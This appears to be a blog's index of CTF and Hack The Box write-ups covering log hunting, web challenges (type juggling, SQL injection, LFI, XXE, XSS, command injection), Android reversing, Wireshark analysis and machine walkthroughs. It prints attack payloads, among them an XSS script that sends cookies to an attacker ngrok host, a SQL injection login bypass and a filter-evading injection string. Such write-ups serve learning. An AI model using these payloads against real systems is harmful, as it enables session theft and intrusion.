threat hunting. These logs silently record system events, security incidents, and user interactions, providing crucial insights into system health and security. In this blog, we will explore the art of Windows Event Log analysis\nIm going to discuss log analysis of windows events in linux, we will be utilizing a tool called chainsaw, you can get it \u0026raquo; here.\nIn this tutorial i will be analysing the files from cybertalents blue scholarship.\n1. chainsaw search an attacker after compromising the machine added a new account as admin. can you find the name of the new account? flag format : flag{md5 of string}\nfile \u0026raquo;\u0026raquo; ex1\nIn windows, each event has a unique event id. So we have to find event id for account creation , a quick google search\nThen in chainsaw\n1 2 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4720\u0026#39; Security436509324654726509.evtx Here we can filter events with the event id 4720.\nSAM means security account manager , it is a database that stores accounts on windows systems. Usename is sam md5hash ba0e0cde1bf72c28d435c89a66afc61a.\nflag{ba0e0cde1bf72c28d435c89a66afc61a}\n2. chainsaw hunt file \u0026raquo;\u0026raquo; here\n1 2 3 4 5 6 7 Our network got compromised two days ago by an unknown attacker, and we need to get an answer for the following questions: 1. What is the domain\u0026#39;s SID? 2. The attacker failed to login to some accounts, What is the attacker\u0026#39;s machine IP address? 3. What is the workstation\u0026#39;s name that the attacker was using to authenticate with the administrator account? Flag format: Flag{ANS1_ANS2_ANS3} Since this is account failed login it has event id 4776 for failed login from domain controller. The domain controller in this case is HYDRA-DC.MARVEL.local.\nSince chainsaw has rules to detect certain events , you can use the folowing command to hunt for events\n1 2 ./chainsaw/chainsaw-gnu hunt -r ./chainsaw/rules/ logs.evtx This returns alot of output , but retuns events in a format we can easily comprehend.\n1 2 ./chainsaw/chainsaw-gnu hunt --sigma ./chainsaw/sigma/ --mapping ./chainsaw/mappings/sigma-event-logs-all.yml -r ./chainsaw/rules/lateral_movement/ logs/ You can use the command above to get more info. Now here is where the fun begins.\nFrom the logs we can see that there are several users lke pbarker,fcasle, Administrator and these avents are have a common ipaddress \u0026ldquo;192.168.80.128\u0026rdquo;\nIf we search for the following users in the sigma output , we can find the sid\npbarker : S-1-5-21-271597537-2992796785-3713134209-1105\nfcastle: S-1-5-21-271597537-2992796785-3713134209-1103\nAdminitrator : S-1-5-21-271597537-2992796785-3713134209-500\nThe structure of an sid is as follows :\nS-1-5-21--\u0026lt;relative_id\u0026gt;\nWhere:\nS: A constant prefix indicating that it is a Security Identifier.\n1: Revision number (currently always 1).\n5: Identifier authority value (the identifier authority for Windows is always 5).\n21: The identifier authority\u0026rsquo;s top-level domain identifier. The actual number may vary depending on the Windows version or configuration but is typically 21 for Windows domains.\n: The SID for the domain. It is a unique value assigned to each domain by the domain controller during domain creation.\n\u0026lt;relative_id\u0026gt;: A relative identifier that uniquely identifies a specific security principal within the domain. For users and groups, this relative ID is usually the RID (Relative Identifier) assigned by the domain controller.\nso in this case domain sid is \u0026ldquo;S-1-5-21-271597537-2992796785-3713134209\u0026rdquo;\nTo get the workstation you can ue the command we used earlier to filter events using event id\n1 2 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4776\u0026#39; logs/ | grep -i workstation workstation: THEPUNISHER\nflag is Flag{S-1-5-21-271597537-2992796785-3713134209_192.168.80.128_THEPUNISHER}\n","date":"2023-07-31T16:18:16+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows-events-and-log-analysis/","title":"Windows events and log analysis"},{"content":"ImaginaryCTF Imaginaryctf web writeups Idoriot This web challenge was very simple , while registering a new user you could set their id , so just set user_id as 0 and login to get the flag.\nIdoriot revenge This challenge is related to the first one but we can set the user id as a parameter , in the source , there is this filter\n1 2 3 4 5 6 7 8 9 10 11 if (isset($_GET[\u0026#39;user_id\u0026#39;])) { $user_id = (int) $_GET[\u0026#39;user_id\u0026#39;]; // Check if the user is admin if ($user_id == \u0026#34;php\u0026#34; \u0026amp;\u0026amp; preg_match(\u0026#34;/\u0026#34;.$admin[\u0026#39;username\u0026#39;].\u0026#34;/\u0026#34;, $_SESSION[\u0026#39;username\u0026#39;])) { // Read the flag from flag.txt $flag = file_get_contents(\u0026#39;/flag.txt\u0026#39;); echo \u0026#34;\u0026lt;h1\u0026gt;Flag\u0026lt;/h1\u0026gt;\u0026#34;; echo \u0026#34;\u0026lt;p\u0026gt;$flag\u0026lt;/p\u0026gt;\u0026#34;; } } it checks if the user_id is equal to \u0026ldquo;php\u0026rdquo; and if the username contains \u0026ldquo;admin\u0026rdquo;.\nThis is classic php type juggling read more \u0026raquo; here there is also a chart on the pdf showing what will be regerded as True or False in php, in this case if i set user_id=0 it will be equal to \u0026ldquo;php\u0026rdquo;. For the username , register any user with a username that contains \u0026ldquo;admin\u0026rdquo; but not \u0026ldquo;admin\u0026rdquo; like eg (admino) to satisfy the regex check.\nBlank This challenge tested knowledge is sql.\n1 2 db.get(\u0026#39;SELECT * FROM users WHERE username = \u0026#34;\u0026#39; + username + \u0026#39;\u0026#34; and password = \u0026#34;\u0026#39; + password+ \u0026#39;\u0026#34;\u0026#39;, (err, row) =\u0026gt; { as you can see , user input is directly added to the sql statement which is very dangerous. Also the application was not checking the password.\n1 2 3 4 app.get(\u0026#39;/flag\u0026#39;, (req, res) =\u0026gt; { if (req.session.username == \u0026#34;admin\u0026#34;) { res.send(\u0026#39;Welcome admin. The flag is \u0026#39; + fs.readFileSync(\u0026#39;flag.txt\u0026#39;, \u0026#39;utf8\u0026#39;)); } THe username had to be \u0026ldquo;admin\u0026rdquo;. so we can only inject via password field\nThis will satisfy this part of the code and return rows\n1 2 3 4 5 if (row) { console.log(row,req.session.username); req.session.loggedIn = true; req.session.username = username; res.send(\u0026#39;Login successful!\u0026#39;); Perfect picture This challenge required uploading a picture with specific characterictics\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 def check(uploaded_image): with open(\u0026#39;flag.txt\u0026#39;, \u0026#39;r\u0026#39;) as f: flag = f.read() with Image.open(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image) as image: w, h = image.size if w != 690 or h != 420: return 0 if image.getpixel((412, 309)) != (52, 146, 235, 123): return 0 if image.getpixel((12, 209)) != (42, 16, 125, 231): return 0 if image.getpixel((264, 143)) != (122, 136, 25, 213): return 0 with exiftool.ExifToolHelper() as et: metadata = et.get_metadata(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image)[0] try: if metadata[\u0026#34;PNG:Description\u0026#34;] != \u0026#34;jctf{not_the_flag}\u0026#34;: return 0 if metadata[\u0026#34;PNG:Title\u0026#34;] != \u0026#34;kool_pic\u0026#34;: return 0 if metadata[\u0026#34;PNG:Author\u0026#34;] != \u0026#34;anon\u0026#34;: return 0 except: return 0 return flag to satisfy those i wrote a python script\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 from PIL import Image def create_and_modify_image(): # Step 1: Create the Image width, height = 690, 420 image = Image.new(\u0026#34;RGBA\u0026#34;, (width, height), (255, 255, 255, 0)) # Step 2: Modify Pixel Colors image.putpixel((412, 309), (52, 146, 235, 123)) image.putpixel((12, 209), (42, 16, 125, 231)) image.putpixel((264, 143), (122, 136, 25, 213)) # Step 3: Save the Image image.save(\u0026#34;created_image.png\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: create_and_modify_image() you also have to run the following command to set the exit data\n1 2 exiftool -PNG:Description=\u0026#34;jctf{not_the_flag}\u0026#34; -PNG:Title=\u0026#34;kool_pic\u0026#34; -PNG:Author=\u0026#34;anon\u0026#34; created_image.png Roks This challenge was obviously an lfi\nphp urldecode() only decodes once i.e it only decodes one layer , so if i encode on several layers i can bypass the filter which only decoded 2 layers\nthe flag was at ../../../../flag.png according to the dockerfile , urlencode this 3 times and send it to get the flag\nLogin This challenge tested knowledge in sql and bcrypt hashing.\nUsing sqlmap you could extract the database table users and data\n1 2 3 4 pwhash,username $2y$10$vw1OC907/WpJagql/LmHV.7zs8I3RE9N0BC4/Tx9I90epSI2wr3S.,guest $2y$10$Is00vB1hRNHYBl9BzJwDouQFCU85YyRjJ81q0CX1a3sYtvsZvJudC,admi the hashes are clearly bcrypt\nto login as admin we can use the following sql statement. I got it from \u0026raquo; here . Here we can set our own bcrypt hash which we have knowledge of the password.\n1 2 3 4 5 xxx\u0026#39; UNION SELECT \u0026#39;admin\u0026#39; AS username,\u0026#39;$2y$10$C4lfi0f8kouggVBFkKF1ru./NEQTKqptjJCh6JI/hJieELWHLeFXi\u0026#39; AS pwhash-- and the password as \u0026#34;a\u0026#34; Here we get the magic , in my case it was \u0026ldquo;688a35c685a7a654abc80f8e123ad9f0\u0026rdquo;\nIn the code if we supply the magic as a get parameter the flag will be appended to the password , Bcrypt has a character limit of 72 , so if we set a password of more than 72 characters it will be truncated and only the first 72 characters will be hashed as the password . I had seen technique in an ippsec video recently https://www.youtube.com/watch?v=E5TOeiCnGkE\u0026amp;t=3183s , Luckyme :)\nAnyways here is the exploit \u0026raquo; here\nflag : ictf{why_are_bcrypt_truncating_my_passwords?!}\n","date":"2023-07-23T12:41:18+03:00","image":"https://f0rk3b0mb.github.io/cover/imaginary_ctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/imaginaryctf2023/","title":"ImaginaryCTF2023"},{"content":"Wireshark packet analysis (basic) To demonstrate this, I will be analyzing a pcap from bicWC. You can also download this pcap and follow along \u0026raquo; here.\nYou can also download this \u0026raquo; here. I will use this pcap to demonstrate how to extract files from captured network traffic.\nDEMO 1 How many packets have been captured?\nThe number of packets is shown at the right bottom of the screenshot above: 1309\nWhat is the IP address of the attacker?\nHere we will use the TCP filter in Wireshark as shown below:\nThe IP address is 45.15.156.72\nWhich city is the IP address based in?\nWe will use an online IP locator tool:\nThe city is Amsterdam\nHow many DNS servers are in the pcap?\nHere we just use the DNS filter in Wireshark:\nThe answer is two. There is one with IP xxx.100 and xxx.101\nWhat is the IP of the NTP server?\nHere we will use the NTP filter in Wireshark:\nThe IP address, as you can see above, is 51.145.123.29\nWhat machine ID was transmitted to the attacker?\nHere we will follow the TCP stream of one of the requests to the attacker as shown below. This time we will use the IP address filter \u0026lt;ip.addr == 45.15.156.72\u0026gt;:\nThe machine ID is a parameter of the POST request.\nWhat is the user-agent?\nAs you can see from the picture above, the user-agent is \u0026ldquo;x\u0026rdquo;\nWhat was the MAC address of the compromised machine?\nWe just have to double click on one of the TCP packets between the attacker and compromised machine as shown below. The MAC address is on the blue line I have highlighted:\nWhat email address is the registrar of the IP address?\nHere we will conduct a WHOIS search on the IP address. To make it even easier, we will combine it with a grep filter for the @ symbol, which is used in email addresses:\nDEMO 2 Scrolling through the pcap, you can see weird filenames ending in .ts. I googled this and found out that it is a file extension for video files.\nTo extract files, you will first have to identify the stream of the files you want to extract. In this case, it\u0026rsquo;s stream 3. Select packet \u0026gt; right click \u0026gt; follow TCP stream.\nYou can move through subsequent streams by using the stream buttons:\nYou now have to export the stream to a file. In my case, I called the file filtered.pcapng:\nOpen the filtered.pcapng in Wireshark. Go to File \u0026gt; Export Objects \u0026gt; HTTP:\nYou can click on each and then save. The resulting files can be opened with any video player. The flag is in WyK2SW5mcYDArna2IlwZ4C4SwDjZ717a5.ts.\nThe above challenges are a good entry to learning to use Wireshark and understanding networking.\n","date":"2023-07-14T11:47:02+03:00","image":"https://f0rk3b0mb.github.io/cover/5613.jpg","permalink":"https://f0rk3b0mb.github.io/p/packet-analysis-using-wireshark/","title":"Packet analysis using Wireshark"},{"content":"Nahamcon CTF 2023 writeups warmups blobber Thic challenge had a downloadable part , the file was a sqlite database.\nI opened the file using sqlite database browser\nbrowsing the data there is only gibberish , except on line 238 where data is a blob object.Blobs in sqlite is whereby files can be addedtto database as entries. Read more here\nwe can use this sql statement to get the blob\n1 2 select data from blobber where id=238 Then save it to a file , the resulting file in is a bzip2 archive, extracting , you get an image of the flag\nninety one In this challenge you are provided with an encoded string\n1 @iH\u0026lt;,{|jbRH?L^VjGJH\u0026lt;vn3p7I,x~@1jyt\u0026gt;x?,!YAJr*08P I used this tool \u0026raquo; here to analyse and decode it , it was encrypted using base91 encoding\n1 2 flag{dfb88c7d9ca38e71dc27e1072fc43d1b} glasses This challenge you were provided with a webpage. It had no functionality, based on the title of the challenge it is obvious that we nee to find something hidden.\nLokking through the source I found obfuscated js code. You can use this tool \u0026raquo; here to deobfuscate it . It returns html code the with the flag\n1 2 flag{8084e4530cf649814456f2a291eb81e9} web category starwars In this challenge you are provided with a web endpoint that allows you to signup and login The goal is to login as admin , you can also comment and the admin reviews your comment , obvoiusly it is classic xxs\nthis below is the payload i used . it fetches my ngrok endpoint with the cookie appanded at the end. I dont know if the first part was necessary , I generated it by trial and error and it worked\n1 2 3 4 5 6 \u0026#34;\u0026gt;\u0026lt;script\u0026gt; var iframe = document.body.appendChild(document.createElement(\u0026#39;iframe\u0026#39;)); iframe.style.cssText = \u0026#39;height: 500px; width: 100%\u0026#39;; iframe.src = \u0026#39;http://challenge.nahamcon.com:30467/signup\u0026#39;; iframe.onload = function() { fetch(\u0026#39;http://f910-102-167-145-177.ngrok-free.app?iframeContents=\u0026#39; + btoa(window.document.cookie), { method: \u0026#39;GET\u0026#39; }).then(response =\u0026gt; response.json()).then(data =\u0026gt; console.log(data)).catch(error =\u0026gt; console.error(error)); };\u0026lt;/script\u0026gt; the flag will be returned in base64 format. Use it in the browser to access /admin page and the flag\nmisc category zombies In this challenge you were provided with an ssh endpoint to connect to\nreading the file .user-entrypoint.sh\nnohup is enables a program to run even after a terminal window is closed , if you check running processes you can see that tail is still running. Running processes usually have the activities stored in /proc directory. in the image below 11 is the pid of the tail process\nmobile category This challenge requires a set of tools to be able to do anything :\ndex2jar\njdgui\nghidra\ngenymotion \u0026laquo; android emulator on pc\nadb\napktools\njninjaspeak In this challnge you are provided with an apk file , you can install it on genymotion using adb, it is a simple prompt that converts input to jninjaspeak.\n1 adb install jninjaspeak.apk Decompile the application using apktool\n1 2 use : apktool -r -s d jninjaspeak.apk We use -r -s flags to tell apktool not to decompile the dexfiles to smali which it does by default.\nConvert the dex files to jar using dex2jar to be able to view the source using jdgui.\nIn the mainactivity we see that the program needs libjninjaspeak.so liblary that is used to translate the input.\nHere we use ghidra to reverse engineer the liblary , the liblary is in the /lib in the folder apktool generated.\nIn ghidra , in the main function of the liblary we find the flag\nflag{1f539e4a706e6181dae9db3fad6a78f1}\nFortune teller For this challenge follow the above steps to install and decompile the application and convers dex files to jar.\nThe mainactivity function in located the classes3.dex. Looking closely you can see that the application uses our input as a key to decrypt an encrypted file , the encryption used is AES.\nThe file is decrypted in the decrypt.class. Where our input is used in the SecretKeySpec object.\nBased on my simple java programming undertanding :) there is a variable called correctString that is initialized in the main function.\nIt is followed by its getter function\nand then tracing it we find the setter function\nIt sets correctString to the value by resource id 2131755048 . Resource ids can be traced what that point to in the classes2.dex, path is shown below\nIt is point to a string , the resorces can be found the /res folder since the value is a string we goto /res/values and cat strings.xml.\nThe key is \u0026ldquo;you won this ctf\u0026rdquo; , enter it and get the flag\nwheres waldo In this challenge you are provided with an apk file , follow the steps above to decompile it and open the sources in jd gui and install it in the emulator.\nThis application is some type of maps applcation so the objective is to find the location of waldo in the map.\nAnalysing the mainactivity function you can see thet the application is making a request to an endpoint which determines id we have found waldo and the distance from him\nThe objective is to set longitude and latitude that results on the off_by value to result to zero as you can see below\n1 2 3 4 mapView1.getController().setCenter((IGeoPoint)new GeoPoint(location.getLatitude(), location.getLongitude())); Request request = (new Request.Builder()).url(\u0026#34;http://challenge.nahamcon.com:30001/location?lat=\u0026#34; + location.getLatitude() + \u0026#34;\u0026amp;long=\u0026#34; + location.getLongitude()).build(); Response response = (new OkHttpClient()).newCall(request).execute(); the code above takes the off_by and calculates the distance from waldo by miles.\nI scripted this python program to do all the hardwork (at least).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 import requests def calculate_distance(latitude, longitude): url = f\u0026#39;http://challenge.nahamcon.com:30001/location?lat={latitude}\u0026amp;long={longitude}\u0026#39; print(url) # Replace with the actual API endpoint response = requests.get(url) print(response.text) data = response.json() off_by = data.get(\u0026#34;off_by\u0026#34;) i = off_by print(i) return(i) def move(): pos=list() for x in range(-180,180,30): for y in range(0,30,2): dis=calculate_distance(y,x) pos.append(list) print(pos) move() The code above i used to be able to narrow down on which coordinated produces the least distance from waldo\n1 2 3 4 lat=30\u0026amp;long=-60 low 1099.613580066382 this was the lowest from here i entered the values manually by trying raising the value higher or lower and chacking the changes in the distance\nat lat=40.60 and long -74.67 we needed to go even smaller units so i researched and found out that api use the following format to show distance\n1 2 3 4 Latitude: ±DD.DDDDDD Longitude: ±DDD.DDDDDD where D is any number between 1-9 final position lat=40.583333 and long=-74.67\n","date":"2023-06-15T20:58:33+03:00","permalink":"https://f0rk3b0mb.github.io/p/nahamcon2023/","title":"Nahamcon2023"},{"content":"htb pc writeup category: web\ndifficulty: easy\nHello, and welcome to another walkthrough of a htb machine.\nWhen you run a port scan on the target we get port 22 open , a full port scan reveals port 50015 that nmap cannot tell the service which it is running\n1 2 open port 22 open port 50015 a little reserarch i found out that the service is grpc \u0026raquo; for more datails of what it is here\nTo interect with grpc we need some tools one of them is called grpcurl and there is also grpcui\nThey are golang application so you need to have goland installed on your machine.\nIn this procudure i am going to use grpcui , the difference between the two is one has ui and the other is cli.\nwe create a new user test:test, we login in and are given a jwt token. I f we make a request to the getinfo() we receive response as shown below.\nThere is an id field we can try different ids and it returns an error , if you append a single quot it returns a format error , this is a good indicator of sqli.\n1 \u0026#34;message\u0026#34;: \u0026#34;Unexpected \\u003cclass \u0026#39;TypeError\u0026#39;\\u003e: bad argument type for built-in operation\u0026#34; I saved the request in a file and fired up sqlmap\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 POST /invoke/SimpleApp.getInfo HTTP/1.1 Host: 127.0.0.1:41553 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json x-grpcui-csrf-token: ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY X-Requested-With: XMLHttpRequest Content-Length: 190 Origin: http://127.0.0.1:41553 Connection: close Referer: http://127.0.0.1:41553/ Cookie: wp-settings-1=libraryContent%3Dbrowse; _grpcui_csrf_token=ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {\u0026#34;metadata\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;token\u0026#34;,\u0026#34;value\u0026#34;:\u0026#34;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NjMyMTkzMX0.L624cRHm_TXyUSDTBU14H82b2DNq44JacxN9XfT1cKU\u0026#34;}],\u0026#34;data\u0026#34;:[{\u0026#34;id\u0026#34;:\u0026#34;1*\u0026#34;}]} I added * next to the id number to tell sqlmap to test that field . NOTE: if you dont do this sqlmap will run tests on the outer json only.\nHere are the tables and data of table accounts\n1 2 3 4 5 6 7 8 9 10 11 12 13 +----------+ | accounts | | messages | +----------+ +------------------------+----------+ | password | username | +------------------------+----------+ | admin | admin | | HereIsYourPassWord1431 | sau | +------------------------+----------+ We can login to ssh as the user sau. The we read user.txt\nI uploaded linpeas.sh to the target and ran it , I found out that there was a webserver listening on port 127.0.0.1:8000. To access it on our machine we can use a technique known as ssh port forwarding.\n1 2 3 4 5 Here is the command ssh -L 8000:localhost:8000 sau@10.10.11.214 It will map port 8000 on the server to port 8000 locally Visiting the url we find out it is a login page of pyload. Since we dont have login creds , I searched for exploits aganist pyload and luckily there is an unathenticated rce.\nI used this exploit to understand more on how i works , here.\nRunning the exploit we get are root :() and we can read root.txt.\nREFERENCES for gprc and other ways to expoit it:\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-1-c0059362c4b5\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-2-b1fd38f8cd88\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-4-f1c260bbb00a\n","date":"2023-06-09T17:22:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-pc/","title":"HTB PC"},{"content":"HTB monitortwo writeup categoty : web\ndifficulty : easy\nAs always we begin with a port scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-02 12:45 EAT Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 56.80% done; ETC: 12:46 (0:00:15 remaining) Nmap scan report for 10.10.11.211 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Login to Cacti Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.63 seconds As you can see there is a web interface , it is a login page and it utilizes something called cacti version 1.2.22\nUsing searchsploit :\nrunning the exploit, BOOM!! we get a reverse shell\nLooking around there is nothing really interesting , i ran linpeas and all i could find was a suid binary called capsh , you can check out how to exploit it here\nbut there was nothing in the root folder , turns out we were in a docker container that ran the webserver.The file that caught my attention was entrypoint.sh in the root folder.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 #!/bin/bash set -ex wait-for-it db:3306 -t 300 -- echo \u0026#34;database is connected\u0026#34; if [[ ! $(mysql --host=db --user=root --password=root cacti -e \u0026#34;show tables\u0026#34;) =~ \u0026#34;automation_devices\u0026#34; ]]; then mysql --host=db --user=root --password=root cacti \u0026lt; /var/www/html/cacti.sql mysql --host=db --user=root --password=root cacti -e \u0026#34;UPDATE user_auth SET must_change_password=\u0026#39;\u0026#39; WHERE username = \u0026#39;admin\u0026#39;\u0026#34; mysql --host=db --user=root --password=root cacti -e \u0026#34;SET GLOBAL time_zone = \u0026#39;UTC\u0026#39;\u0026#34; fi chown www-data:www-data -R /var/www/html # first arg is `-f` or `--some-option` if [ \u0026#34;${1#-}\u0026#34; != \u0026#34;$1\u0026#34; ]; then set -- apache2-foreground \u0026#34;$@\u0026#34; fi exec \u0026#34;$@\u0026#34; As you can see , we can use that format to run mysql statements.I used the following to dump users in the user_auth table.\n1 mysql --host=db --user=root --password=root cacti -e \u0026#34;SELECT * FROM user_auth\u0026#34; We get that there are 3 user accounts, admin, guest and marcus and their password hashes.I saved the hashes to a file and let john-the-ripper do its thing.\nI tried logging in the webpage but i got access denied and then tried ssh login as marcus, BOOM!! i am now marcus.\nWe can read the user.txt in the home folder\nI tried running linpeas again but still got nothing , also checked suid binaries but still nothing , at this point i did not know what to do.\nI got a hint that there was a docker vulnerability that resulted in privilledge escalation , you can read more and get the exploit here CVE-2021-41091\nFor this exploit to work you will utilize the capsh privesc we had discovered earlier in the reverse shell to set the \u0026ldquo;chmod u+s bash\u0026rdquo; .\nthen we execute the bash binary above as the in the marcus ssh session, BOOM!! root baby!!\nGoodbye ;)\n","date":"2023-06-02T16:31:02+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-monitortwo/","title":"HTB Monitortwo"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T13:03:23+03:00","permalink":"https://f0rk3b0mb.github.io/p/bic-winter-con-2023/","title":"Bic winter con 2023"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T12:59:47+03:00","image":"https://f0rk3b0mb.github.io/cover/ca-logo-2023.webp","permalink":"https://f0rk3b0mb.github.io/p/htb-cyberapocalypse-2023/","title":"htb cyberapocalypse 2023"},{"content":"xee1 category: web\nsolution From the title you can tell this is a classic xxe challenge , when you capture the login request in burp repeater you will realize that the username is echoed out , so we have to make sure the output of our xxe payload is reflected in the page through the user name field.\nI crafted a payload to read /flag.txt , we also need to pass it through a php filter , we get the flag in base64 format\nxee2 category: web\nsolution This challenge is a subsequent of xxe2 but required a more complex approach, this time we have to receive the flag remotely since our user input is not being reflaected in the site , this is known as blind xxe . You can read more about it here\nso after some research i created thhis payload that reads the /flag.txt and sends it to a ngrok endpoint, ps we also have to pass read the flag through a php filter\nI get a hit and we can decode the flag from base64 as shown below\nBing category: web\nsolution This was a little complicated , i saw it as more of a bash jail than a web challenge.\nBasically you wegiven a simple site with page that would serve the flag, there was clearly command injection , cince you could run the i command. There was also a poor attempt at a regex filter at the frontend so this challnge could only be solved using burp.\nfile reading commands like cat were blocked also spaces , so you had to try any command you knew to read a file. Heres the solution:\n\u0026lsquo;head$IFS/fl??.txt|rev\u0026rsquo;\nwithout the rev the page will not display there may be a flag filter , so we reverse it\n","date":"2023-05-21T12:44:03+03:00","image":"https://f0rk3b0mb.github.io/cover/deadsec.jpeg","permalink":"https://f0rk3b0mb.github.io/p/deadsec-2023/","title":"Deadsec 2023"}] \ No newline at end of file +[{"content":"Walkthrough of Active Directory Lab Goad-Light. Check it out \u0026raquo; here\nPort Scan 192.168.0.150\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 PORT STATE SERVICE VERSION 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-07 16:27:08Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) |_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:kingslanding.sevenkingdoms.local | Issuer: commonName=SEVENKINGDOMS-CA | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-11-07T09:42:05 | Not valid after: 2025-11-07T09:42:05 | MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 |_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) |_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:kingslanding.sevenkingdoms.local | Issuer: commonName=SEVENKINGDOMS-CA | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-11-07T09:42:05 | Not valid after: 2025-11-07T09:42:05 | MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 |_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) |_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:kingslanding.sevenkingdoms.local | Issuer: commonName=SEVENKINGDOMS-CA | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-11-07T09:42:05 | Not valid after: 2025-11-07T09:42:05 | MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 |_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:kingslanding.sevenkingdoms.local | Issuer: commonName=SEVENKINGDOMS-CA | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-11-07T09:42:05 | Not valid after: 2025-11-07T09:42:05 | MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 |_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd |_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. 3389/tcp open ssl/ms-wbt-server? | rdp-ntlm-info: | Target_Name: SEVENKINGDOMS | NetBIOS_Domain_Name: 